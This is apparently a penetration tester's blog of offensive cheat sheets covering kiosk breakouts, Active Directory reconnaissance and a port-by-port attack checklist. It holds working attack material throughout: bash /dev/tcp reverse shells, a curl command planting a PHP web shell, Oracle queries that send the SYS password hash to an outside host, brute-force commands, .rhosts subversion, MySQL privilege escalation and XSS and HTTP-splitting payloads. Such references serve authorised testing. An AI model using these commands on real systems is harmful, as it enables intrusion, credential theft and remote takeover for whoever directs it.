Pen Test Diary

Sabtu, 09 Desember 2017

Kiosk Breakout Cheatsheet

Thngs to try to escape the kiosk (from HitThemLow):

CTRL-SHIFT-ESC Task manager
ALT-TAB Switch Task
CTRL-ALT-DELETE Task Manager
SHIFT*5 Sticky Keys
ALT-F4 Close application
Windows Key Start menu

In the browser:
File:/C:/windows
File:/C:\windows\
File:/C:\windows/
File:/C:/windows
File://C:/windows
File://C:\windows/
file://C:\windows
C:/windows
C:\windows\
C:\windows
C:/windows/
C:/windows\
%WINDIR%
%TMP%
%TEMP%
%SYSTEMDRIVE%
%SYSTEMROOT%
%APPDATA%
%HOMEDRIVE%
%HOMESHARE%

Keycombos for in the browser:
CTRL-B, CTRL-I Favourites
CTRL-H History)
CTRL-L, CTL 0 File/Open Dialog
CTRL-P Print Dialog
CTRL-S Save As

Mash the keyboard to try and find others that may be hidden (admin menues)

Use the "about" protocol to try and access things:
about:<input%20type=file>
about:<a%20href=C:\windows\>Click-Here</a>

use the "shell" protocol to access executables
Shell:Profile
Shell:ProgramFiles
Shell:System
Shell:ControlPanelFolder
Shell:Windows
shell:::{21EC2020 3AEA 1069 A2DD 08002B30309D} //WIndows Control Panels ClassID

Dont forget iKat !!

Javashells and the res: protocol are good :)

Other protos to try:

Callto://
Gopher://
HCP://
Telnet://
TN3270://
Rlogin://
LDAP://
News://
Mailto://
MMS://
SKYPE://
SIP://
Play://
Steam://
Quicktime://
smb://
ftp://

You can use HCP to spawn a cmd.exe

You can embed files in .doc files and kiosks dont usually stop thar ;)

More things:
Jython Shell
Java applets
activex (object.execute('cmd.exe'))
.NET CLR
flash filereference()

Notepad can open remote files

Other ways to spawn a shell
cmd.exe
command.com
win.com
cmd.exe
win.com
command.com
Loadfix.com start.exe
sc create testsvc binpath= loadfix.com cmd.exe loadfix.com command.com
"cmd /K start type= own cmd start" type type= interact
start loadfix.com cmd.exe
start loadfix.com
start loadfix.com %COMSPEC%
command.com
cmd.exe

also firefox -

If you want to make quick and dirty HTML in FireFox use the address-bar like:
data:text/html,Click-Here</a>

also note to self, don't forget

Sub macro1()
'
' shell Macro
'
'
Dim sPath As String
sPath = "c:windows"
'retVal = shell("explorer.exe" & sPath, vbNormalFocus)
retVal = shell("C:\\windows\\system32\\cmd.exe", vbNormalFocus)
End Sub

Jumat, 10 November 2017

Host/Security Build Review

Host/Security Build Review conducts a detailed analysis of the system's security configuration and implementation, identifying potential vulnerabilities and weaknesses. This evaluation benchmarks the system against recognised industry guidelines created by the Centre for Internet Security.

This assessment provides insight into the host's ability to withstand attack from unauthorised users and protect itself against valid users abusing their privileges and access. The main focus is to identify any vulnerability that could be used to compromise the host system or conduct ex-filtration of data.

Tools
https://github.com/CISOfy/lynis
https://github.com/cyberisltd/NixAudit/blob/master/solaris_audit.sh
https://github.com/lateralblast/lunar/
https://github.com/aaron868/security-audit

References
https://www.cyberis.co.uk/2012/07/expect-scripts-to-perform-build-reviews.html
https://www.cisecurity.org/cis-benchmarks/
https://github.com/topics/hardening

Jumat, 27 Oktober 2017

Commands for Corporate Domain Compromise

Once inside a network, attackers disguise themselves as normal,authenticated users. This ensures they won’t be detected during any reconnaissance or lateral movement activities. Once completed, they return information about any and all resources inside, including: users, servers, applications, identities, and naming conventions. With this information, attackers then assemble their plan to move laterally and ultimately steal data, encrypt computers, or sabotage the organization.

Fundamental Reconnaissance

Command	Description
whoami	Tells us which user we are authenticated as
gpresult	Gives us the effective userpermissions and the grouppolicies enabled of the account
nltest /dclist:domain.demo	Lists all Domain Controllers
[System.DirectoryServices. ActiveDirectory Forest]::GetCurrent Forest(). Sites \| select Name, Subnets	Shows us the Subnets of the network

Servers, Computers & Applications Reconnaissance

Command	Description
net group "domain computers" /domain	Gives us a full list of all the workstations and servers joined to the domain
([adsisearcher]”(&(objectClass= Computer)(name=**))”).FindAll ().properties	Giv es us all attribut es associated with a particular computer
([adsisearcher]”(&(objectClass =Computer)(servicePrincipal Name=X))”).FindAll()	Enumerates all of the computers and servers in the domain that are running X application (dfs, MSSQL)

Identities, Credentials & Privileged Users Reconnaissance

Command	Description
net group "domain admins" /domain	Gives us a list of the designated administrators joined to the domain
([adsisearcher]”(&(objectClass=person)(objectClass=User)(admincount=1))”). FindAll()	Filters for all privileged accounts
([adsisearcher]”(&(objectClass=person)(objectClass=User)(name=**))”).FindAll().properties	Gives usa ll attributes associated with a particular user
[adsisearcher]”(&(objectClass=User)(primarygroupid=513(servicePrincipalName=*))”).FindAll() \| ForEach-Object{ "Name: $($_.properties.name)""SPN:$($_.properties.serviceprincipalname)""Path: $($_.Path)"""}	Enumerates all of the crackable service accounts

Kamis, 14 September 2017

Insecurity in Networks

Enumeration

TCP Port Scan

https://github.com/commonexploits/port-scan-automation
nmap -n -vvvv -sT -p- -A -iL livehost.txt -oA nmap_scan

UDP Port Scan

https://github.com/portcullislabs/udp-proto-scanner
nmap -n -sU -sC -vvv --top-ports 100 -iL livehost.txt -oA nmap_scan

IPv6 Port Scan

nmap -6 ip_address

FTP port 21 open

Fingerprint server
- telnet ip_address 21 (Banner grab)
- Run command ftp ip_address
- ftp@example.com
- Check for anonymous access
  - ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
Password guessing
Examine configuration files
- ftpusers
- ftp.conf
- proftpd.conf
MiTM
- pasvagg.pl

SSH port 22 open

Fingerprint server
- telnet ip_address 22 (banner grab)
- scanssh
  - scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
Password guessing
- ssh root@ip_address
- guess-who
  - ./b -l username -h ip_address -p 22 -2 < password_file_location
- Hydra brute force
- brutessh
- Ruby SSH Bruteforcer
Examine configuration files
- ssh_config
- sshd_config
- authorized_keys
- ssh_known_hosts
- .shosts
SSH Client programs
- tunnelier
- winsshd
- putty
- winscp

Telnet port 23 open

Fingerprint server
- telnet ip_address
  - Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
- telnetfp
Password Attack
- Common passwords
- Hydra brute force
- Brutus
- telnet -l "-froot" hostname (Solaris 10+)
Examine configuration files
- /etc/inetd.conf
- /etc/xinetd.d/telnet
- /etc/xinetd.d/stelnet

Sendmail Port 25 open

Fingerprint server
- telnet ip_address 25 (banner grab)
Mail Server Testing
- Enumerate users
  - VRFY username (verifies if username exists - enumeration of accounts)
  - EXPN username (verifies if username is valid - enumeration of accounts)
- Mail Spoof Test
  - HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
- Mail Relay Test
  - HELO anything
    - Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
    - Unknown domain - mail from: <user@unknown_domain>
    - Domain not present - mail from: <user@localhost>
    - Domain not supplied - mail from: <user>
    - Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
    - Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
    - Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
    - User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
    - Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
    - Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
Examine Configuration Files
- sendmail.cf
- submit.cf

DNS port 53 open

Fingerprint server/ service
- host
  - host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
- nslookup
  - nslookup [ -option ... ] [ host-to-find | - [ server ]]
- dig
  - dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
- whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
DNS Enumeration
- Bile Suite
  - perl BiLE.pl [website] [project_name]
  - perl BiLE-weigh.pl [website] [input file]
  - perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
  - perl vet-mx.pl [input file] [true domain file] [output file]
  - perl exp-tld.pl [input file] [output file]
  - perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
  - perl qtrace.pl [ip_address_file] [output_file]
  - perl jarf-rev [subnetblock] [nameserver]
- txdns
  - txdns -rt -t domain_name
  - txdns -x 50 -bb domain_name
  - txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
Examine Configuration Files
- host.conf
- resolv.conf
- named.conf

TFTP port 69 open

TFTP Enumeration
- tftp ip_address PUT local_file
- tftp ip_address GET conf.txt (or other files)
- Solarwinds TFTP server
- tftp – i <IP> GET /etc/passwd (old Solaris)
TFTP Bruteforcing
- TFTP bruteforcer
- Cisco-Torch

Finger Port 79 open

User enumeration
- finger 'a b c d e f g h' @example.com
- finger admin@example.com
- finger user@example.com
- finger 0@example.com
- finger .@example.com
- finger **@example.com
- finger test@example.com
- finger @example.com
Command execution
- finger "|/bin/id@example.com"
- finger "|/bin/ls -a /@example.com"
Finger Bounce
- finger user@host@victim
- finger @internal@external

Web Ports 80, 8080 etc. open

Fingerprint server
- Telnet ip_address port
- Firefox plugins
  - All
    - firecat
  - Specific
Crawl website
- lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
- httprint
- Metagoofil
  - metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
- Nikto
  - nikto [-h target] [options]
- DirBuster
- Wikto
- Goolag Scanner
Vulnerability Assessment
- Manual Tests
  - Default Passwords
  - Install Backdoors
    - ASP
      - http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
    - Assorted
      - http://michaeldaw.org/projects/web-backdoor-compilation/
      - http://open-labs.org/hacker_webkit02.tar.gz
    - Perl
      - http://home.arcor.de/mschierlm/test/pmsh.pl
      - http://pentestmonkey.net/tools/perl-reverse-shell/
      - http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
    - PHP
      - http://php.spb.ru/remview/
      - http://pentestmonkey.net/tools/php-reverse-shell/
      - http://pentestmonkey.net/tools/php-findsock-shell/
    - Python
      - http://matahari.sourceforge.net/
    - TCL
      - http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
    - Bash Connect Back Shell
      - GnuCitizen
        
        Atttack Box: nc -l -p Port -vvv
        
        Victim: $ exec 5<>/dev/tcp/IP_Address/Port
        Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
      - Neohapsis
        
        Atttack Box: nc -l -p Port -vvv
        
        Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
        Victim: $ exec 1>&0 # Next we copy stdin to stdout
        Victim: $ exec 2>&0 # And finally stdin to stderr
        Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
  - Method Testing
    - nc IP_Adress Port
      - HEAD / HTTP/1.0
      - OPTIONS / HTTP/1.0
      - PROPFIND / HTTP/1.0
      - TRACE / HTTP/1.1
      - PUT http://Target_URL/FILE_NAME
      - POST http://Target_URL/FILE_NAME HTTP/1.x
  - Upload Files
    - curl
      - curl -u <username:password> -T file_to_upload <Target_URL>
      - curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
      - curl -X PUT -v -d "<?php system($_GET['cmd']); ?>" <Target_URL>
    - put.pl
      - put.pl -h target -r /remote_file_name -f local_file_name
    - webdav
      - cadaver
  - View Page Source
    - Hidden Values
    - Developer Remarks
    - Extraneous Code
    - Passwords!
  - Input Validation Checks
    - NULL or null
      - Possible error messages returned.
    - ' , " , ; , <!
      - Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
    - – , = , + , "
      - Used to craft SQL Injection queries.
    - ‘ , &, ! , ¦ , < , >
      - Used to find command execution vulnerabilities.
    - "><script>alert(1)</script>
      - Basic Cross-Site Scripting Checks.
    - %0d%0a
      - Carriage Return (%0d) Line Feed (%0a)
        
        HTTP Splitting
        
        language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
        
        i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
        
        Cache Poisoning
        
        language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
    - %7f , %ff
      - byte-length overflows; maximum 7- and 8-bit values.
    - -1, other
      - Integer and underflow vulnerabilities.
    - %n , %x , %s
      - Testing for format string vulnerabilities.
    - ../
      - Directory Traversal Vulnerabilities.
    - % , _, *
      - Wildcard characters can sometimes present DoS issues or information disclosure.
    - Ax1024+
      - Overflow vulnerabilities.
  - Automated table and column iteration
    - orderby.py
      - ./orderby.py www.site.com/index.php?id=
    - d3sqlfuzz.py
      - ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
- Vulnerability Scanners
  - Acunetix
  - Grendelscan
  - NStealth
  - Obiwan III
  - w3af
- Specific Applications/ Server Tools
  - Domino
    - dominoaudit
      - dominoaudit.pl [options] -h <IP>
  - Joomla
    - cms_few
      - ./cms.py <site-name>
    - joomsq
      - ./joomsq.py <IP>
    - joomlascan
      - ./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
    - joomscan
      - ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
    - jscan
      - jscan.pl -f hostname
      - (shell.txt required)
  - aspaudit.pl
    - asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
  - Vbulletin
    - vbscan.py
      - vbscan.py <host> <port> -v
      - vbscan.py -update
  - ZyXel
    - zyxel-bf.sh
    - snmpwalk
      - snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
    - snmpget
      - snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
Proxy Testing
- Burpsuite
- Crowbar
- Interceptor
- Paros
- Requester Raw
- Suru
- WebScarab
Examine configuration files
- Generic
  - Examine httpd.conf/ windows config files
- JBoss
  - JMX Console http://<IP>:8080/jmxconcole/
    - War File
- Joomla
  - configuration.php
  - diagnostics.php
  - joomla.inc.php
  - config.inc.php
- Mambo
  - configuration.php
  - config.inc.php
- Wordpress
  - setup-config.php
  - wp-config.php
- ZyXel
  - /WAN.html (contains PPPoE ISP password)
  - /WLAN_General.html and /WLAN.html (contains WEP key)
  - /rpDyDNS.html (contains DDNS credentials)
  - /Firewall_DefPolicy.html (Firewall)
  - /CF_Keyword.html (Content Filter)
  - /RemMagWWW.html (Remote MGMT)
  - /rpSysAdmin.html (System)
  - /LAN_IP.html (LAN)
  - /NAT_General.html (NAT)
  - /ViewLog.html (Logs)
  - /rpFWUpload.html (Tools)
  - /DiagGeneral.html (Diagnostic)
  - /RemMagSNMP.html (SNMP Passwords)
  - /LAN_ClientList.html (Current DHCP Leases)
  - Config Backups
    - /RestoreCfg.html
    - /BackupCfg.html
    - Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
      - ZyXEL Config Reader
Examine web server logs
- c:\winnt\system32\Logfiles\W3SVC1
  - awk -F " " '{print $3,$11} filename | sort | uniq
References
- White Papers
- Books
Exploit Frameworks
- Brute-force Tools
  - Acunetix
- Metasploit
- w3af

Portmapper port 111 open

rpcdump.py
- rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
rpcinfo
- rpcinfo [options] IP_Address

NTP Port 123 open

NTP Enumeration
- ntpdc -c monlist IP_ADDRESS
- ntpdc -c sysinfo IP_ADDRESS
- ntpq
  - host
  - hostname
  - ntpversion
  - readlist
  - version
Examine configuration files
- ntp.conf

NetBIOS Ports 135-139,445 open

NetBIOS enumeration
- Enum
  - enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
- Null Session
  - net use \\192.168.1.1\ipc$ "" /u:""
    - net view \\ip_address
    - Dumpsec
- Smbclient
  - smbclient -L //server/share password options
- Superscan
  - Enumeration tab.
- user2sid/sid2user
- Winfo
NetBIOS brute force
Examine Configuration Files
- Smb.conf
- lmhosts

SNMP port 161 open

Default Community Strings
- public
- private
- cisco
  - cable-docsis
  - ILMI
MIB enumeration
- Windows NT
  - .1.3.6.1.2.1.1.5 Hostnames
  - .1.3.6.1.4.1.77.1.4.2 Domain Name
  - .1.3.6.1.4.1.77.1.2.25 Usernames
  - .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
  - .1.3.6.1.4.1.77.1.2.27 Share Information
- Solarwinds MIB walk
- Getif
- snmpwalk
  - snmpwalk -v <Version> -c <Community string> <IP>
- Snscan
- Applications
  - ZyXel
    - snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
    - snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
SNMP Bruteforce
- onesixtyone
  - onesixytone -c SNMP.wordlist <IP>
- cat
  - ./cat -h <IP> -w SNMP.wordlist
- Solarwinds SNMP Brute Force
- ADMsnmp
Examine SNMP Configuration files
- snmp.conf
- snmpd.conf
- snmp-config.xml

LDAP Port 389 Open

ldap enumeration
- ldapminer
  - ldapminer -h ip_address -p port (not required if default) -d
- luma
  - Gui based tool
- ldp
  - Gui based tool
- openldap
  - ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
  - ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  - ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
  - ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  - ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
ldap brute force
- bf_ldap
  - bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
- K0ldS
- LDAP_Brute.pl
Examine Configuration Files
- General
  - containers.ldif
  - ldap.cfg
  - ldap.conf
  - ldap.xml
  - ldap-config.xml
  - ldap-realm.xml
  - slapd.conf
- IBM SecureWay V3 server
  - V3.sas.oc
- Microsoft Active Directory server
  - msadClassesAttrs.ldif
- Netscape Directory Server 4
  - nsslapd.sas_at.conf
  - nsslapd.sas_oc.conf
- OpenLDAP directory server
  - slapd.sas_at.conf
  - slapd.sas_oc.conf
- Sun ONE Directory Server 5.1
  - 75sas.ldif

PPTP/L2TP/VPN port 500/1723 open

Modbus port 502 open

modscan

rlogin port 513 open

Rlogin Enumeration
- Find the files
  - find / -name .rhosts
  - locate .rhosts
- Examine Files
  - cat .rhosts
- Manual Login
  - rlogin hostname -l username
  - rlogin <IP>
- Subvert the files
  - echo ++ > .rhosts
Rlogin Brute force
- Hydra

rsh port 514 open

Rsh Enumeration
- rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
Rsh Brute Force
- rsh-grind
- Hydra
- medusa

SQL Server Port 1433 1434 open

SQL Enumeration
- piggy
- SQLPing
  - sqlping ip_address/hostname
- SQLPing2
- SQLPing3
- SQLpoke
- SQL Recon
- SQLver
SQL Brute Force
- SQLPAT
  - sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
  - sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
- SQL Dict
- SQLAT
- Hydra
- SQLlhf
- ForceSQL

Citrix port 1494 open

Citrix Enumeration
- Default Domain
- Published Applications
  - ./citrix-pa-scan {IP_address/file | - | random} [timeout]
  - citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
Citrix Brute Force
- bforce.js
- connect.js
- Citrix Brute-forcer
- Reference Material
  - Hacking Citrix - the legitimate backdoor
  - Hacking Citrix - the forceful way

Oracle Port 1521 Open

Oracle Enumeration
- oracsec
- Repscan
- Sidguess
- Scuba
- DNS/HTTP Enumeration
  - SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
  - SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
- WinSID
- Oracle default password list
- TNSVer
  - tnsver host [port]
- TCP Scan
- Oracle TNSLSNR
  - Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
- TNSCmd
  - perl tnscmd.pl -h ip_address
  - perl tnscmd.pl version -h ip_address
  - perl tnscmd.pl status -h ip_address
  - perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
- LSNrCheck
- Oracle Security Check (needs credentials)
- OAT
  - sh opwg.sh -s ip_address
  - opwg.bat -s ip_address
  - sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
- OScanner
  - sh oscanner.sh -s ip_address
  - oscanner.exe -s ip_address
  - sh reportviewer.sh oscanner_saved_file.xml
  - reportviewer.exe oscanner_saved_file.xml
- NGS Squirrel for Oracle
- Service Register
  - Service-register.exe ip_address
- PLSQL Scanner 2008
Oracle Brute Force
- OAK
  - ora-getsid hostname port sid_dictionary_list
  - ora-auth-alter-session host port sid username password sql
  - ora-brutesid host port start
  - ora-pwdbrute host port sid username password-file
  - ora-userenum host port sid userlistfile
  - ora-ver -e (-f -l -a) host port
- breakable (Targets Application Server Port)
  - breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
- SQLInjector (Targets Application Server Port)
  - sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
  - sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
- Check Password
- orabf
  - orabf [hash]:[username] [options]
- thc-orakel
  - Cracker
  - Client
  - Crypto
- DBVisualisor
  - Sql scripts from pentest.co.uk
  - Manual sql input of previously reported vulnerabilties
Oracle Reference Material
- Understanding SQL Injection
- SQL Injection walkthrough
- SQL Injection by example
- Advanced SQL Injection in Oracle databases
- Blind SQL Injection
- SQL Cheatsheets
  - http://ha.ckers.org/sqlinjection
    http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
    http://www.0x000000.com/?i=14
    http://pentestmonkey.net/

NFS Port 2049 open

NFS Enumeration
- showmount -e hostname/ip_address
- mount -t nfs ip_address:/directory_found_exported /local_mount_point
NFS Brute Force
- Interact with NFS share and try to add/delete
- Exploit and Confuse Unix
Examine Configuration Files
- /etc/exports
- /etc/lib/nfs/xtab

Compaq/HP Insight Manager Port 2301,2381open

HP Enumeration
- Authentication Method
  - Host OS Authentication
  - Default Authentication
    - Default Passwords
- Wikto
- Nstealth
HP Bruteforce
- Hydra
- Acunetix
Examine Configuration Files
- path.properties
- mx.log
- CLIClientConfig.cfg
- database.props
- pg_hba.conf
- jboss-service.xml
- .namazurc

MySQL port 3306 open

Enumeration
- nmap -A -n -p3306 <IP Address>
- nmap -A -n -PN --script:ALL -p3306 <IP Address>
- telnet IP_Address 3306
- use test; select * from test;
- To check for other DB's -- show databases
Administration
- MySQL Network Scanner
- MySQL GUI Tools
- mysqlshow
- mysqlbinlog
Manual Checks
- Default usernames and passwords
  - username: root password:
  - testing
    - mysql -h <Hostname> -u root
    - mysql -h <Hostname> -u root
    - mysql -h <Hostname> -u root@localhost
    - mysql -h <Hostname>
    - mysql -h <Hostname> -u ""@localhost
- Configuration Files
  - Operating System
    - windows
      - config.ini
      - my.ini
        
        windows\my.ini
        
        winnt\my.ini
      - <InstDir>/mysql/data/
    - unix
      - my.cnf
        
        /etc/my.cnf
        
        /etc/mysql/my.cnf
        
        /var/lib/mysql/my.cnf
        
        ~/.my.cnf
        
        /etc/my.cnf
  - Command History
    - ~/.mysql.history
  - Log Files
    - connections.log
    - update.log
    - common.log
  - To run many sql commands at once -- mysql -u username -p < manycommands.sql
  - MySQL data directory (Location specified in my.cnf)
    - Parent dir = data directory
    - mysql
    - test
    - information_schema (Key information in MySQL)
      - Complete table list -- select table_schema,table_name from tables;
      - Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
      - File privileges -- select user,file_priv from mysql.user where user='root';
      - Version -- select version();
      - Load a specific file -- SELECT LOAD_FILE('FILENAME');
  - SSL Check
    - mysql> show variables like 'have_openssl';
      - If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
- Privilege Escalation
  - Current Level of access
    - mysql>select user();
    - mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
  - Access passwords
    - mysql> use mysql
    - mysql> select user,password from user;
  - Create a new user and grant him privileges
    - mysql>create user test identified by 'test';
    - mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
  - Break into a shell
    - mysql> \! cat /etc/passwd
    - mysql> \! bash
SQL injection
- mysql-miner.pl
  - mysql-miner.pl http://target/ expected_string database
- http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
- http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
References.
- Design Weaknesses
  - MySQL running as root
  - Exposed publicly on Internet
- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
- http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

RDesktop port 3389 open

Rdesktop Enumeration
- Remote Desktop Connection
Rdestop Bruteforce
- TSGrinder
  - tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
- Tscrack

Sybase Port 5000+ open

Sybase Enumeration
- sybase-version ip_address from NGS
Sybase Vulnerability Assessment
- Use DBVisualiser
  - Sybase Security checksheet
    - Copy output into excel spreadsheet
    - Evaluate mis-configured parameters
  - Manual sql input of previously reported vulnerabilties
    - Advanced SQL Injection in SQL Server
    - More Advanced SQL Injection
- NGS Squirrel for Sybase

SIP Port 5060 open

SIP Enumeration
- netcat
  - nc IP_Address Port
- sipflanker
  - python sipflanker.py 192.168.1-254
- Sipscan
- smap
  - smap IP_Address/Subnet_Mask
  - smap -o IP_Address/Subnet_Mask
  - smap -l IP_Address
SIP Packet Crafting etc.
- sipsak
  - Tracing paths: - sipsak -T -s sip:usernaem@domain
  - Options request:- sipsak -vv -s sip:username@domain
  - Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
- siprogue
SIP Vulnerability Scanning/ Brute Force
- tftp bruteforcer
  - Default dictionary file
  - ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
- VoIPaudit
- SiVuS
Examine Configuration Files
- SIPDefault.cnf
- asterisk.conf
- sip.conf
- phone.conf
- sip_notify.conf
- <Ethernet address>.cfg
- 000000000000.cfg
- phone1.cfg
- sip.cfg etc. etc.

VNC port 5900^ open

VNC Enumeration
- Scans
